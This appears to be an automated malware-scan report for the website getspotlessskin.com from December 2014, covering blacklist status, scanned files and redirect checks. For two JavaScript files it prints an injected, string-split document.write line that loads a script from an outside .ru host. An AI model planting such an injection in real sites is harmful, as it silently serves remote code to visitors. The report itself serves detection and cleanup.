Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=getspotlessskin.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://getspotlessskin.com/ | 200 OK Content-Length: 19545 Content-Type: text/html | clean |
http://getspotlessskin.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8425 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4142 bytes skipped]... e "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<sc'+'ript type="text/javascript" src="http://greatrow.ru/Password.js"></scri'+'pt>'); Antivirus reports:
| ||
http://getspotlessskin.com/Scripts/floatingdiv.js | 200 OK Content-Length: 6881 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4099 bytes skipped]... > floatingMenu.nextY = floatingMenu.calculateCornerY(); floatingMenu.move(); } if (document.layers) floatingMenu.addEvent(window, 'onload', floatingMenu.init); else { floatingMenu.init(); floatingMenu.addEvent(window, 'onload', floatingMenu.initSecondary); } document.write('<sc'+'ript type="text/javascript" src="http://greatrow.ru/Password.js"></scri'+'pt>'); Antivirus reports:
| ||
http://getspotlessskin.com/test404page.js | 403 Forbidden Content-Length: 404 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: getspotlessskin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Dec 2014 16:15:25 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 19545
Content-Type: text/html
...19545 bytes of data.
GET / HTTP/1.1
Host: getspotlessskin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Dec 2014 16:15:25 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 19545
Content-Type: text/html
...19545 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: getspotlessskin.com
Referer: http://www.google.com/search?q=getspotlessskin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: getspotlessskin.com
Referer: http://www.google.com/search?q=getspotlessskin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.